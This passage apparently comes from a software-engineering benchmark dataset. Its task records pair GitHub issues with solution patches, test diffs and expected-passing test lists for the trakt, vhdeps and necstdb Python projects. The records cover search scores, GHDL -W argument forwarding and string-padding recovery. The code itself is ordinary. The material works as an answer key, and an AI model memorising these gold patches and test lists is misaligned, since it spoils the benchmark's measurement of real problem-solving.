", "number": 2, "season": 2003, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/079/142/posters/medium/ecf7fa7ec3.jpg", "full": "https://walter.trakt.us/images/shows/000/079/142/posters/original/ecf7fa7ec3.jpg", "thumb": "https://walter.trakt.us/images/shows/000/079/142/posters/thumb/ecf7fa7ec3.jpg"}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "1969", "ids": {"trakt": 79142, "slug": "bad-days"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 1304962, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4571070}, "overview": "Batman doesn't really have bad days, but he definitely has bad nights..", "number": 9, "season": 1, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/073/361/posters/medium/df4f1c96c2.jpg", "full": "https://walter.trakt.us/images/shows/000/073/361/posters/original/df4f1c96c2.jpg", "thumb": "https://walter.trakt.us/images/shows/000/073/361/posters/thumb/df4f1c96c2.jpg"}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "2005", "ids": {"trakt": 73361, "slug": "snl-digital-shorts"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "title": "Batman", "season": 7, "number": 6, "ids": {"trakt": 1227579, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4670467}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "2009", "ids": {"trakt": 94515, "slug": "3-2009"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/001/690/018/screenshots/medium/f333de513d.jpg", "full": "https://walter.trakt.us/images/episodes/001/690/018/screenshots/original/f333de513d.jpg", "thumb": "https://walter.trakt.us/images/episodes/001/690/018/screenshots/thumb/f333de513d.jpg"}}, "title": "BATMAN!!!", "season": 2010, "number": 55, "ids": {"trakt": 1690018, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4599451}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "1998", "ids": {"trakt": 96440, "slug": "joulukalenteri-tonttu-toljanterin-joulupulma"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "title": "Batman", "season": 1, "number": 3, "ids": {"trakt": 1766428, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4681124}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "2002", "ids": {"trakt": 14649, "slug": "cheat"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 535228, "tvrage": 356329, "tmdb": 526964, "imdb": "", "tvdb": 143833}, "overview": "Endless summer", "number": 1, "season": 1, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/078/744/posters/medium/ee26d1337b.jpg", "full": "https://walter.trakt.us/images/shows/000/078/744/posters/original/ee26d1337b.jpg", "thumb": "https://walter.trakt.us/images/shows/000/078/744/posters/thumb/ee26d1337b.jpg"}, 
"fanart": {"medium": "https://walter.trakt.us/images/shows/000/078/744/fanarts/medium/ee26d1337b.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/078/744/fanarts/thumb/ee26d1337b.jpg"}}, "year": "2012", "ids": {"trakt": 78744, "slug": "revansch"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/001/302/992/screenshots/medium/7b86b4bbe3.jpg", "full": "https://walter.trakt.us/images/episodes/001/302/992/screenshots/original/7b86b4bbe3.jpg", "thumb": "https://walter.trakt.us/images/episodes/001/302/992/screenshots/thumb/7b86b4bbe3.jpg"}}, "ids": {"trakt": 1302992, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4770106}, "overview": "As a kid you maybe sold your NES to afford the upcoming SNES. Victor is certainly one of them. 20 years later he visits his parents' attic and finds this game. Is this fate?", "number": 10, "season": 1, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 102553, "slug": "you-think-you-know-comics"}, "year": "2014", "title": "You Think You Know Comics"}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "title": "Batman", "season": 2014, "number": 2, "ids": {"trakt": 2015951, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 5357566}}, "score": 91.11184}
]
},
- "search?query=batman&type=episode&year=1987": {
- "GET": [
- {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/900/posters/medium/d67bbc0a62.jpg", "full": "https://walter.trakt.us/images/shows/000/000/900/posters/original/d67bbc0a62.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/900/posters/thumb/d67bbc0a62.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/900/fanarts/medium/1eae79bc72.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/000/900/fanarts/thumb/1eae79bc72.jpg"}}, "year": "1987", "ids": {"trakt": 900, "slug": "french-saunders"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/medium/5bd7342a6a.jpg", "full": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/original/5bd7342a6a.jpg", "thumb": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/thumb/5bd7342a6a.jpg"}}, "title": "Batman", "season": 5, "number": 4, "ids": {"trakt": 59025, "tvrage": 64781, "tmdb": null, "imdb": "", "tvdb": 165596}}, "score": 91.11184}
- ]
- },
- "search?query=cranston&type=person": {
+ "search/person?query=cranston": {
"GET": [
{"type": "person", "person": {"images": {"headshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 154029, "tvrage": null, "slug": "bob-cranston", "imdb": "", "tmdb": 587197}, "name": "Bob Cranston"}, "score": 94.57829},
{"type": "person", "person": {"images": {"headshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 364188, "tvrage": null, "slug": "al-cranston", "imdb": "", "tmdb": 1309602}, "name": "Al Cranston"}, "score": 94.57829},
diff --git a/tests/test_episodes.py b/tests/test_episodes.py
index 0561180..530882e 100644
--- a/tests/test_episodes.py
+++ b/tests/test_episodes.py
@@ -20,7 +20,7 @@ def test_episode_search():
def test_episode_search_with_year():
results = TVEpisode.search('batman', year=1987)
assert isinstance(results, list)
- assert len(results) == 1
+ assert len(results) == 10
assert all(isinstance(m, TVEpisode) for m in results)
diff --git a/tests/test_search.py b/tests/test_search.py
index 785bcba..7e4a2ba 100644
--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -3,22 +3,12 @@
import pytest
from trakt.movies import Movie
from trakt.people import Person
-from trakt.sync import search, search_by_id
+from trakt.sync import get_search_results, search, search_by_id, SearchResult
from trakt.tv import TVEpisode, TVShow
__author__ = 'Reinier van der Windt'
-def test_invalid_searches():
- """test that the proper exceptions are raised when an invalid search or id
- type is provided to a search function
- """
- functions = [search, search_by_id]
- for fn in functions:
- with pytest.raises(ValueError):
- fn('shouldfail', 'fake')
-
-
def test_search_movie():
"""test that movie search results are successfully returned"""
batman_results = search('batman')
@@ -26,10 +16,11 @@ def test_search_movie():
assert len(batman_results) == 2
assert all(isinstance(m, Movie) for m in batman_results)
+
def test_search_movie_with_year():
batman_results = search('batman', year='1966')
assert isinstance(batman_results, list)
- assert len(batman_results) == 1
+ assert len(batman_results) == 2
assert all(isinstance(m, Movie) for m in batman_results)
@@ -79,3 +70,12 @@ def test_search_person_by_id():
results = search_by_id('nm0186505', id_type='imdb')
assert isinstance(results, list)
assert all(isinstance(p, Person) for p in results)
+
+
+def test_get_search_results():
+ """test that entire results can be returned by get_search_results"""
+ results = get_search_results('batman', search_type=['movie'])
+ assert isinstance(results, list)
+ assert len(results) == 2
+ assert all(isinstance(r, SearchResult) for r in results)
+ assert all([r.score != 0.0 for r in results])
diff --git a/tests/test_shows.py b/tests/test_shows.py
index 518b5d5..a3f5bb5 100644
--- a/tests/test_shows.py
+++ b/tests/test_shows.py
@@ -91,7 +91,7 @@ def test_show_search():
def test_show_search_with_year():
results = TVShow.search('batman', year=1999)
assert isinstance(results, list)
- assert len(results) == 1
+ assert len(results) == 10
assert all(isinstance(m, TVShow) for m in results)
|
score is not added in the Movie class
Hi
I can see there is a `score` field in the response but can't find it in the `Movie` class in this library
https://trakt.docs.apiary.io/#reference/search/text-query/get-text-query-results
I want this field, is there a way to get it?
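
For reference, a minimal sketch of how the `get_search_results` helper introduced by this patch could expose the score, using the names from the test patch above (trakt credentials are assumed to be configured elsewhere):

```python
from trakt.sync import get_search_results

# Each SearchResult wraps one media item together with its relevancy score.
results = get_search_results('batman', search_type=['movie'])
for result in results:
    # result.type is e.g. 'movie', result.score is the trakt.tv relevancy
    # score, and result.media is the wrapped Movie object.
    print(result.type, result.score, result.media)
```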
|
0.0
|
490b465291cb546a903160007aa2eacc85cd4d7c
|
[
"tests/test_episodes.py::test_get_episodes",
"tests/test_episodes.py::test_episode_search",
"tests/test_episodes.py::test_episode_search_with_year",
"tests/test_episodes.py::test_get_episode",
"tests/test_episodes.py::test_episode_comments",
"tests/test_episodes.py::test_episode_ratings",
"tests/test_episodes.py::test_episode_watching_now",
"tests/test_episodes.py::test_episode_images",
"tests/test_episodes.py::test_episode_ids",
"tests/test_episodes.py::test_rate_episode",
"tests/test_episodes.py::test_oneliners",
"tests/test_episodes.py::test_episode_comment",
"tests/test_episodes.py::test_episode_scrobble",
"tests/test_episodes.py::test_episode_magic_methods",
"tests/test_search.py::test_search_movie",
"tests/test_search.py::test_search_movie_with_year",
"tests/test_search.py::test_search_show",
"tests/test_search.py::test_search_episode",
"tests/test_search.py::test_search_person",
"tests/test_search.py::test_search_movie_by_id",
"tests/test_search.py::test_search_show_by_id",
"tests/test_search.py::test_search_episode_by_id",
"tests/test_search.py::test_search_person_by_id",
"tests/test_search.py::test_get_search_results",
"tests/test_shows.py::test_dismiss_show_recomendation",
"tests/test_shows.py::test_recommended_shows",
"tests/test_shows.py::test_trending_shows",
"tests/test_shows.py::test_popular_shows",
"tests/test_shows.py::test_updated_shows",
"tests/test_shows.py::test_get_show",
"tests/test_shows.py::test_aliases",
"tests/test_shows.py::test_translations",
"tests/test_shows.py::test_get_comments",
"tests/test_shows.py::test_get_people",
"tests/test_shows.py::test_ratings",
"tests/test_shows.py::test_related",
"tests/test_shows.py::test_watching",
"tests/test_shows.py::test_show_search",
"tests/test_shows.py::test_show_search_with_year",
"tests/test_shows.py::test_show_ids",
"tests/test_shows.py::test_oneliners",
"tests/test_shows.py::test_show_comment",
"tests/test_shows.py::test_rate_show"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-06-26 02:06:30+00:00
|
apache-2.0
| 4,027
|
|
abs-tudelft__vhdeps-22
|
diff --git a/vhdeps/targets/ghdl.py b/vhdeps/targets/ghdl.py
index 3e0e2b8..ff426a1 100644
--- a/vhdeps/targets/ghdl.py
+++ b/vhdeps/targets/ghdl.py
@@ -81,7 +81,22 @@ def add_arguments(parser):
'regardless of whether it passed or not. If there are multiple test '
'cases, gtkwave is launched for the first failure.')
-def _get_ghdl_cmds(vhd_list, ieee='synopsys', no_debug=False, coverage=None, **_):
+ parser.add_argument(
+ '-W', action='append', metavar='#{#},<options>', dest='extra_args',
+ # It'd be great to use [] here ^^^ but Python devs managed to
+ # sufficiently bork argparse's internals to make that break before
+ # Python 3.8. Since it's completely asenine to require 3.8 for
+ # something like this, {} will have to do.
+ help='Pass comma-separated options to the command specified by #. The '
+ 'first # can be \'a\' for the analysis command, \'e\' for the '
+ 'elaboration command, and \'r\' for the run command. If a second '
+ 'character is specified, <options> are chained to a \'-W#,<options>\' '
+ 'option for the command specified by the first letter. For instance, '
+ '\'-Wac,-O3\' passes -O3 to the GCC compiler during the analysis '
+ 'phase.')
+
+def _get_ghdl_cmds(vhd_list, ieee='synopsys', no_debug=False,
+ coverage=None, extra_args=None, **_):
"""Returns a three-tuple of the analyze, elaborate, and run commands for
GHDL in plumbum form."""
@@ -130,6 +145,25 @@ def _get_ghdl_cmds(vhd_list, ieee='synopsys', no_debug=False, coverage=None, **_
ghdl_analyze = ghdl_analyze['-Wc,-fprofile-arcs', '-Wc,-ftest-coverage', '-Wc,-O3']
ghdl_elaborate = ghdl_elaborate['-Wl,-lgcov']
+ # Add user-specified extra arguments.
+ if extra_args:
+ for extra_arg in extra_args:
+ if ',' not in extra_arg:
+ raise ValueError('invalid value for -W')
+ target, *args = extra_arg.split(',')
+ if len(target) not in (1, 2):
+ raise ValueError('invalid value for -W')
+ if len(target) == 2:
+ args = ['-W%s,%s' % (target[1], ','.join(args))]
+ if target[0] == 'a':
+ ghdl_analyze = ghdl_analyze[args]
+ elif target[0] == 'e':
+ ghdl_elaborate = ghdl_elaborate[args]
+ elif target[0] == 'r':
+ ghdl_run = ghdl_run[args]
+ else:
+ raise ValueError('invalid value for -W')
+
return ghdl_analyze, ghdl_elaborate, ghdl_run
def _run_test_case(output_file, test_case, vcd_dir, ghdl_elaborate, ghdl_run):
|
abs-tudelft/vhdeps
|
f2b55a77340e99d13e1adea753c63d10f2b06d79
|
diff --git a/tests/test_ghdl.py b/tests/test_ghdl.py
index a02b2a8..9e16da5 100644
--- a/tests/test_ghdl.py
+++ b/tests/test_ghdl.py
@@ -2,6 +2,7 @@
from unittest import TestCase, skipIf
from unittest.mock import patch
+import re
import os
import tempfile
from plumbum import local
@@ -254,6 +255,22 @@ class TestGhdlSpecific(TestCase):
code, _, _ = run_vhdeps('ghdl', '-i', DIR+'/simple/multiple-ok', '-j')
self.assertEqual(code, 1)
+ def test_extra_options(self):
+ """Test the -W option for GHDL"""
+ with local.env(PATH=DIR+'/ghdl/fake-ghdl:' + local.env['PATH']):
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-W'), 0)
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-Wx'), 0)
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-W,x'), 0)
+ self.assertNotEqual(run_vhdeps('ghdl', '-i', DIR+'/simple/all-good', '-Wx,x'), 0)
+ code, out, _ = run_vhdeps(
+ 'ghdl', '-i', DIR+'/simple/all-good',
+ '-Wa,a,na,lyze', '-We,e,la,bo,rate', '-Wr,run', '-Wrx,a,b,c')
+ self.assertEqual(code, 0)
+ self.assertTrue(bool(re.search(r'ghdl -a [^\n]* a na lyze', out)))
+ self.assertTrue(bool(re.search(r'ghdl -e [^\n]* e la bo rate', out)))
+ self.assertTrue(bool(re.search(r'ghdl -r [^\n]* run', out)))
+ self.assertTrue(bool(re.search(r'ghdl -r [^\n]* -Wx,a,b,c', out)))
+
@skipIf(
not coverage_supported(),
|
Passing arbitrary arguments to GHDL
Sometimes one might want to pass some extra arguments to GHDL, especially with the GCC backend to pass additional compiler flags. There is currently no command-line syntax for this.
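
A standalone sketch of the option splitting added by the patch above, mirroring the rules in `_get_ghdl_cmds`; `parse_extra_arg` is a hypothetical helper name used only for illustration:

```python
def parse_extra_arg(extra_arg):
    """Split one -W value into (command letter, list of arguments)."""
    if ',' not in extra_arg:
        raise ValueError('invalid value for -W')
    target, *args = extra_arg.split(',')
    if len(target) not in (1, 2):
        raise ValueError('invalid value for -W')
    if len(target) == 2:
        # Chain the options into a -W<letter>,<options> flag for the
        # underlying tool (e.g. the GCC compiler behind ghdl -a).
        args = ['-W%s,%s' % (target[1], ','.join(args))]
    # target[0] selects the phase: 'a' analyze, 'e' elaborate, 'r' run.
    return target[0], args

print(parse_extra_arg('ac,-O3'))  # ('a', ['-Wc,-O3']) -> -O3 for GCC at analysis
print(parse_extra_arg('r,run'))   # ('r', ['run'])     -> appended to the run command
```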
|
0.0
|
f2b55a77340e99d13e1adea753c63d10f2b06d79
|
[
"tests/test_ghdl.py::TestGhdlSpecific::test_extra_options"
] |
[
"tests/test_ghdl.py::TestGhdlSpecific::test_analyze_error",
"tests/test_ghdl.py::TestGhdlSpecific::test_elaborate_error",
"tests/test_ghdl.py::TestGhdlSpecific::test_multi_version",
"tests/test_ghdl.py::TestGhdlSpecific::test_no_ghdl",
"tests/test_ghdl.py::TestGhdlSpecific::test_no_plumbum",
"tests/test_ghdl.py::TestGhdlSpecific::test_no_wc",
"tests/test_ghdl.py::TestGhdlSpecific::test_unknown_version"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-07-12 14:41:55+00:00
|
apache-2.0
| 860
|
|
ogawa-ros__necstdb-27
|
diff --git a/necstdb/necstdb.py b/necstdb/necstdb.py
index 05c1bb3..9715f1e 100644
--- a/necstdb/necstdb.py
+++ b/necstdb/necstdb.py
@@ -7,20 +7,20 @@ timestamp), various kinds of weather data (temperature + humidity + wind speed +
direction + ... + timestamp), etc.
"""
-
-from typing import Union, List, Tuple, Dict, Any
-import re
-import os
+import json
import mmap
-import struct
+import os
import pathlib
-import json
+import re
+import struct
import tarfile
+from typing import Any, Dict, List, Tuple, Union
import numpy
import pandas
from . import utils
+from .recover import recover
def duplicate_rename(path: pathlib.Path, _i: int = 0) -> pathlib.Path:
@@ -423,9 +423,12 @@ class table:
for col in cols:
size = struct.calcsize(col["format"])
+ if "x" in col["format"]: # Pad field
+ offset += col["size"]
+ continue
dat = struct.unpack(col["format"], data[offset : offset + size])
if len(dat) == 1:
- dat = dat[0]
+ (dat,) = dat
dict_[col["key"]] = dat
offset += col["size"]
@@ -448,18 +451,28 @@ class table:
formats = [col["format"] for col in cols]
def parse_dtype(format_character: str) -> str:
+ def str_format(length: Union[str, int], count: Union[str, int]):
+ count = count if int(count) > 1 else ""
+ return f"{count}S{length}"
+
format_character = re.sub(
r"^([\d+s]+)$",
- lambda m: f"{m.group(1).count('s')}S{m.group(1).split('s')[0]}",
+ lambda m: str_format(m.group(1).split("s")[0], m.group(1).count("s")),
format_character,
)
+
+ format_character = format_character.replace("x", "V")
return self.endian + format_character
np_formats = [parse_dtype(col["format"]) for col in cols]
keys = [col["key"] for col in cols]
offsets = utils.get_struct_indices(formats, self.endian)[:-1]
+
+ pad = ["x" in col["format"] for col in cols]
+ data_field = [k for k, p in zip(keys, pad) if not p]
+
dtype = numpy.dtype({"names": keys, "formats": np_formats, "offsets": offsets})
- return numpy.frombuffer(data, dtype=dtype)
+ return numpy.frombuffer(data, dtype=dtype)[data_field]
@property
def recovered(self) -> "table":
@@ -481,11 +494,7 @@ class table:
such as 1e-308)
"""
- self.endian = ""
- self.open(self._name, self._mode)
- for dat in self.header["data"]:
- dat["format"] = dat["format"].replace("i", "?")
- return self
+ return recover(self)
def opendb(path: os.PathLike, mode: str = "r") -> "necstdb":
diff --git a/necstdb/recover.py b/necstdb/recover.py
new file mode 100644
index 0000000..8cd2671
--- /dev/null
+++ b/necstdb/recover.py
@@ -0,0 +1,52 @@
+from typing import TYPE_CHECKING
+
+import numpy
+
+if TYPE_CHECKING:
+ from .necstdb import table
+
+
+def recover(t: "table") -> "table":
+ fmt = "".join([d["format"] for d in t.header["data"]])
+
+ if (t.endian == "<") and ("i" in fmt):
+ t.endian = ""
+ t.open(t._name, t._mode)
+ for dat in t.header["data"]:
+ dat["format"] = dat["format"].replace("i", "?")
+
+ if "s" in fmt:
+ modified_header_data = []
+ for dat in t.header["data"]:
+ if "s" not in dat["format"]:
+ modified_header_data.append(dat)
+ else:
+ dat_numpy = t.read(astype="sa")
+ this_field = dat_numpy[dat["key"]]
+ lengths = numpy.unique([len(d) for d in this_field])
+ if len(lengths) > 1: # Not uniform length
+ modified_header_data.append(dat)
+ else:
+ (length,) = lengths
+ specified = int(dat["format"].rstrip("s"))
+ if length == specified:
+ modified_header_data.append(dat)
+ else:
+ diff = specified - length
+ modified_header_data.append(
+ {
+ "key": dat["key"],
+ "format": f"{length}s",
+ "size": length,
+ }
+ )
+ modified_header_data.append(
+ {
+ "key": f"_{dat['key']}_pad",
+ "format": f"{diff}x",
+ "size": diff,
+ }
+ )
+ t.header["data"] = modified_header_data
+
+ return t
diff --git a/poetry.lock b/poetry.lock
index 147b715..6c0b1f9 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -23,10 +23,10 @@ optional = false
python-versions = ">=3.5"
[package.extras]
-dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "mypy (>=0.900,!=0.940)", "pytest-mypy-plugins", "zope-interface", "furo", "sphinx", "sphinx-notfound-page", "pre-commit", "cloudpickle"]
-docs = ["furo", "sphinx", "zope-interface", "sphinx-notfound-page"]
-tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "mypy (>=0.900,!=0.940)", "pytest-mypy-plugins", "zope-interface", "cloudpickle"]
-tests_no_zope = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "mypy (>=0.900,!=0.940)", "pytest-mypy-plugins", "cloudpickle"]
+dev = ["cloudpickle", "coverage[toml] (>=5.0.2)", "furo", "hypothesis", "mypy (>=0.900,!=0.940)", "pre-commit", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "sphinx", "sphinx-notfound-page", "zope.interface"]
+docs = ["furo", "sphinx", "sphinx-notfound-page", "zope.interface"]
+tests = ["cloudpickle", "coverage[toml] (>=5.0.2)", "hypothesis", "mypy (>=0.900,!=0.940)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins", "zope.interface"]
+tests_no_zope = ["cloudpickle", "coverage[toml] (>=5.0.2)", "hypothesis", "mypy (>=0.900,!=0.940)", "pympler", "pytest (>=4.3.0)", "pytest-mypy-plugins"]
[[package]]
name = "black"
@@ -106,9 +106,9 @@ typing-extensions = {version = ">=3.6.4", markers = "python_version < \"3.8\""}
zipp = ">=0.5"
[package.extras]
-docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"]
+docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"]
perf = ["ipython"]
-testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "packaging", "pep517", "pyfakefs", "flufl-flake8", "pytest-perf (>=0.9.2)", "pytest-black (>=0.3.7)", "pytest-mypy", "importlib-resources (>=1.3)"]
+testing = ["flufl.flake8", "importlib-resources (>=1.3)", "packaging", "pep517", "pyfakefs", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.0.1)", "pytest-flake8", "pytest-mypy", "pytest-perf (>=0.9.2)"]
[[package]]
name = "iniconfig"
@@ -167,7 +167,7 @@ python-dateutil = ">=2.7.3"
pytz = ">=2017.2"
[package.extras]
-test = ["pytest (>=4.0.2)", "pytest-xdist", "hypothesis (>=3.58)"]
+test = ["hypothesis (>=3.58)", "pytest (>=4.0.2)", "pytest-xdist"]
[[package]]
name = "pathspec"
@@ -189,8 +189,8 @@ python-versions = ">=3.6"
importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""}
[package.extras]
-testing = ["pytest-benchmark", "pytest"]
-dev = ["tox", "pre-commit"]
+dev = ["pre-commit", "tox"]
+testing = ["pytest", "pytest-benchmark"]
[[package]]
name = "py"
@@ -317,8 +317,8 @@ optional = false
python-versions = ">=3.6"
[package.extras]
-docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"]
-testing = ["pytest (>=4.6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "jaraco-itertools", "func-timeout", "pytest-black (>=0.3.7)", "pytest-mypy"]
+docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"]
+testing = ["func-timeout", "jaraco.itertools", "pytest (>=4.6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.0.1)", "pytest-flake8", "pytest-mypy"]
[metadata]
lock-version = "1.1"
|
ogawa-ros/necstdb
|
fb254063d80c4f2a2c3047fe4a426e6de0ee6255
|
diff --git a/tests/test_necstdb.py b/tests/test_necstdb.py
index bb5e9f6..7e70c58 100644
--- a/tests/test_necstdb.py
+++ b/tests/test_necstdb.py
@@ -53,10 +53,11 @@ DATA4_HEADER = {
{"key": "array", "format": "3d", "size": 24},
]
}
-DATA5 = ([[b"abc", b"def", b"ghi"]] for _ in range(55))
+DATA5 = ([[b"abc", b"def", b"ghi"], b"jkl"] for _ in range(55))
DATA5_HEADER = {
"data": [
{"key": "strArray", "format": "3s3s3s", "size": 9},
+ {"key": "strLenMismatch", "format": "5s", "size": 5},
]
}
@@ -66,14 +67,17 @@ EXPECTED_DATA1_TUPLE = (3, -16, -32, -64)
EXPECTED_DATA2_TUPLE = (3, 16, 32, 64)
EXPECTED_DATA3_TUPLE = (0.32, 3, b"byte", b"c")
EXPECTED_DATA4_TUPLE = (True, b"str", 3, TIME, TIME)
-EXPECTED_DATA5_TUPLE = (b"abc", b"def", b"ghi")
+EXPECTED_DATA5_TUPLE = (b"abc", b"def", b"ghi", b"jkl\x00\x00")
# DTypes (int8, int16, ...) are not preserved.
EXPECTED_DATA1_DICT = {"int8": 3, "int16": -16, "int32": -32, "int64": -64}
EXPECTED_DATA2_DICT = {"uint8": 3, "uint16": 16, "uint32": 32, "uint64": 64}
EXPECTED_DATA3_DICT = {"float32": 0.32, "float64": 3, "_byte": b"byte", "_char": b"c"}
EXPECTED_DATA4_DICT = {"bool": True, "string": b"str", "array": (3, TIME, TIME)}
-EXPECTED_DATA5_DICT = {"strArray": (b"abc", b"def", b"ghi")}
+EXPECTED_DATA5_DICT = {
+ "strArray": (b"abc", b"def", b"ghi"),
+ "strLenMismatch": b"jkl\x00\x00",
+}
# DTypes (int8, int16, ...) are not preserved.
EXPECTED_DATA1_DF = pd.DataFrame(
@@ -88,7 +92,9 @@ EXPECTED_DATA3_DF = pd.DataFrame(
EXPECTED_DATA4_DF = pd.DataFrame(
[(True, b"str", [3, TIME, TIME])], columns=["bool", "string", "array"]
)
-EXPECTED_DATA5_DF = pd.DataFrame([(["abc", "def", "ghi"],)], columns=["strArray"])
+EXPECTED_DATA5_DF = pd.DataFrame(
+ [(["abc", "def", "ghi"], "jkl\x00\x00")], columns=["strArray", "strLenMismatch"]
+)
EXPECTED_DATA1_ARRAY = np.array(
[(3, -16, -32, -64)],
@@ -107,8 +113,8 @@ EXPECTED_DATA4_ARRAY = np.array(
dtype=[("bool", "?"), ("string", "S3"), ("array", "3f8")],
)
EXPECTED_DATA5_ARRAY = np.array(
- [(["abc", "def", "ghi"],)],
- dtype=[("strArray", "3S3")],
+ [(("abc", "def", "ghi"), "jkl\x00\x00")],
+ dtype=[("strArray", "(3,)S3"), ("strLenMismatch", "S5")],
)
EXPECTED_DATA1_BYTE = b"\x03\xf0\xff\xe0\xff\xff\xff\xc0\xff\xff\xff\xff\xff\xff\xff"
@@ -118,7 +124,7 @@ EXPECTED_DATA4_BYTE = (
b"\x01str"
b"\x00\x00\x00\x00\x00\x00\x08@\xea!\x1b\xc3\x1eJ\xd8A\xea!\x1b\xc3\x1eJ\xd8A"
)
-EXPECTED_DATA5_BYTE = b"abcdefghi"
+EXPECTED_DATA5_BYTE = b"abcdefghijkl\x00\x00"
@pytest.fixture(scope="module")
@@ -249,13 +255,13 @@ class TestReadDatabase:
assert all(EXPECTED_DATA3_ARRAY == actual["data3"][3])
assert all(EXPECTED_DATA4_ARRAY == actual["data4"][3])
assert len(actual["data4"][3]["array"]) == 3
- assert all(EXPECTED_DATA5_ARRAY == actual["data5"][3])
+ assert EXPECTED_DATA5_ARRAY == actual["data5"][3]
assert len(actual["data5"][3]["strArray"]) == 3
def test_read_as_bytes(self, db_path):
db = necstdb.opendb(db_path)
actual = {name: db.open_table(name).read(astype="raw") for name in table_name}
- formats = ["<bhiq", "<BHIQ", "<fd4sc", "<?3s3d", "<3s3s3s"]
+ formats = ["<bhiq", "<BHIQ", "<fd4sc", "<?3s3d", "<3s3s3s5s"]
unpacked = {
k: tuple(struct.iter_unpack(fmt, v))
for fmt, (k, v) in zip(formats, actual.items())
@@ -395,7 +401,7 @@ class TestMethods:
("data2", 330, 22, 15, "<BHIQ"),
("data3", 594, 33, 17, "<fd4sc"),
("data4", 1364, 44, 28, "<?3s3d"),
- ("data5", 495, 55, 9, "<3s3s3s"),
+ ("data5", 495, 55, 14, "<3s3s3s5s"),
],
columns=[
"table name",
diff --git a/tests/test_necstdb_recover.py b/tests/test_necstdb_recover.py
index acaed8e..2cb853d 100644
--- a/tests/test_necstdb_recover.py
+++ b/tests/test_necstdb_recover.py
@@ -4,12 +4,19 @@ import pytest
import necstdb
-EXAMPLE_DATA_PATH = pathlib.Path(".") / "tests" / "example_data"
+
+@pytest.fixture
+def db_path(tmp_path_factory) -> pathlib.Path:
+ """Path to temporary database directory."""
+ return tmp_path_factory.mktemp("test_db")
class TestReadDatabase:
- def test_read_db(self):
- db = necstdb.opendb(EXAMPLE_DATA_PATH)
+
+ EXAMPLE_DATA_PATH = pathlib.Path(".") / "tests" / "example_data"
+
